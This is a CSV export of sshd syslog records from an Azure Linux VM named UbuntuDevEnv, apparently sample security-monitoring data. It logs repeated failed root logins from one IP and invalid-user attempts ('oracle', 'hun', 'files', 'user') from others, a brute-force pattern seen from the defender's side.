+9431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:29,UbuntuDevEnv,2019-06-25 22:38:29,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 38351 ssh2,47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,38351,,
+9432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:41,UbuntuDevEnv,2019-06-25 22:38:40,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 38351 ssh2 [preauth],47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,38351,,
+9433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:41,UbuntuDevEnv,2019-06-25 22:38:40,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 38351 ssh2],47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,38351,,
+9434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:41,UbuntuDevEnv,2019-06-25 22:38:40,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:41,UbuntuDevEnv,2019-06-25 22:38:40,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 38351: Too many authentication failures [preauth],47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,38351,,
+9436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:41,UbuntuDevEnv,2019-06-25 22:38:40,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:44,UbuntuDevEnv,2019-06-25 22:38:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:46,UbuntuDevEnv,2019-06-25 22:38:46,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 54437 ssh2,47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54437,,
+9439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:59,UbuntuDevEnv,2019-06-25 22:38:57,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 54437 ssh2],47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54437,,
+9440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:59,UbuntuDevEnv,2019-06-25 22:38:59,auth,UbuntuDevEnv,info,Invalid user files from 152.250.252.179 port 57168,47768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,152.250.252.1,57168,,
+9441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:59,UbuntuDevEnv,2019-06-25 22:38:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,47768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:59,UbuntuDevEnv,2019-06-25 22:38:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:01,UbuntuDevEnv,2019-06-25 22:39:00,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 54437 ssh2,47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54437,,
+9444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:01,UbuntuDevEnv,2019-06-25 22:39:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:01,UbuntuDevEnv,2019-06-25 22:39:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 54437 ssh2 [preauth],47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54437,,
+9446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:01,UbuntuDevEnv,2019-06-25 22:39:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 54437: Too many authentication failures [preauth],47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,54437,,
+9447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:01,UbuntuDevEnv,2019-06-25 22:39:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:01,UbuntuDevEnv,2019-06-25 22:39:01,auth,UbuntuDevEnv,info,Failed password for invalid user files from 152.250.252.179 port 57168 ssh2,47768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,152.250.252.1,57168,,
+9449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:02,UbuntuDevEnv,2019-06-25 22:39:01,auth,UbuntuDevEnv,info,Disconnected from invalid user files 152.250.252.179 port 57168 [preauth],47768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,152.250.252.1,57168,,
+9450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:02,UbuntuDevEnv,2019-06-25 22:39:01,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 57168:11: Bye Bye [preauth],47768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,57168,,
+9451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:04,UbuntuDevEnv,2019-06-25 22:39:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:06,UbuntuDevEnv,2019-06-25 22:39:05,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65449 ssh2,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65449,,
+9453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:13,UbuntuDevEnv,2019-06-25 22:39:11,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 65449 ssh2],47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65449,,
+9454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:16,UbuntuDevEnv,2019-06-25 22:39:15,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65449 ssh2,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65449,,
+9455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:19,UbuntuDevEnv,2019-06-25 22:39:19,auth,UbuntuDevEnv,info,Invalid user hun from 59.100.246.170 port 58136,47842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hun,59.100.246.1,58136,,
+9456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:19,UbuntuDevEnv,2019-06-25 22:39:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:19,UbuntuDevEnv,2019-06-25 22:39:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170,47842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.100.246.1,,0,
+9458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:19,UbuntuDevEnv,2019-06-25 22:39:19,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65449 ssh2,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65449,,
+9459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:21,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:21,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65449 ssh2,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65449,,
+9461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:21,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 65449 ssh2 [preauth],47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65449,,
+9462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:21,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:21,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 65449: Too many authentication failures [preauth],47784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,65449,,
+9464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:22,auth,UbuntuDevEnv,info,Failed password for invalid user hun from 59.100.246.170 port 58136 ssh2,47842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hun,59.100.246.1,58136,,
+9465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:22,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 58136:11: Bye Bye [preauth],47842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,58136,,
+9466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:22,UbuntuDevEnv,2019-06-25 22:39:22,auth,UbuntuDevEnv,info,Disconnected from invalid user hun 59.100.246.170 port 58136 [preauth],47842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hun,59.100.246.1,58136,,
+9467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:26,UbuntuDevEnv,2019-06-25 22:39:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:28,UbuntuDevEnv,2019-06-25 22:39:28,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13053 ssh2,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:35,UbuntuDevEnv,2019-06-25 22:39:31,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13053 ssh2,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:35,UbuntuDevEnv,2019-06-25 22:39:34,auth,UbuntuDevEnv,info,Invalid user oracle from 139.199.113.140 port 40284,47904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,139.199.113.1,40284,,
+9471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:35,UbuntuDevEnv,2019-06-25 22:39:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:35,UbuntuDevEnv,2019-06-25 22:39:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,47904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:37,UbuntuDevEnv,2019-06-25 22:39:36,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 139.199.113.140 port 40284 ssh2,47904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,139.199.113.1,40284,,
+9474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:37,UbuntuDevEnv,2019-06-25 22:39:36,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 40284:11: Bye Bye [preauth],47904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,40284,,
+9475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:37,UbuntuDevEnv,2019-06-25 22:39:36,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 139.199.113.140 port 40284 [preauth],47904,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,139.199.113.1,40284,,
+9476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:40,UbuntuDevEnv,2019-06-25 22:39:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13053 ssh2,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:43,UbuntuDevEnv,2019-06-25 22:39:43,auth,UbuntuDevEnv,info,Invalid user user from 178.62.54.79 port 50374,47939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,178.62.54.7,50374,,
+9478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:43,UbuntuDevEnv,2019-06-25 22:39:42,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13053 ssh2,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:43,UbuntuDevEnv,2019-06-25 22:39:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:43,UbuntuDevEnv,2019-06-25 22:39:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,47939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:46,UbuntuDevEnv,2019-06-25 22:39:45,auth,UbuntuDevEnv,info,Failed password for invalid user user from 178.62.54.79 port 50374 ssh2,47939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,178.62.54.7,50374,,
+9482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:46,UbuntuDevEnv,2019-06-25 22:39:45,auth,UbuntuDevEnv,info,Disconnected from invalid user user 178.62.54.79 port 50374 [preauth],47939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,178.62.54.7,50374,,
+9483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:46,UbuntuDevEnv,2019-06-25 22:39:45,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 50374:11: Bye Bye [preauth],47939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,50374,,
+9484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:46,UbuntuDevEnv,2019-06-25 22:39:46,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13053 ssh2,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:48,UbuntuDevEnv,2019-06-25 22:39:48,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 13053: Too many authentication failures [preauth],47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,13053,,
+9486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:48,UbuntuDevEnv,2019-06-25 22:39:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:48,UbuntuDevEnv,2019-06-25 22:39:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:48,UbuntuDevEnv,2019-06-25 22:39:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 13053 ssh2 [preauth],47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:48,UbuntuDevEnv,2019-06-25 22:39:48,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13053 ssh2,47868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13053,,
+9490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:39:56,UbuntuDevEnv,2019-06-25 22:39:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47967,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
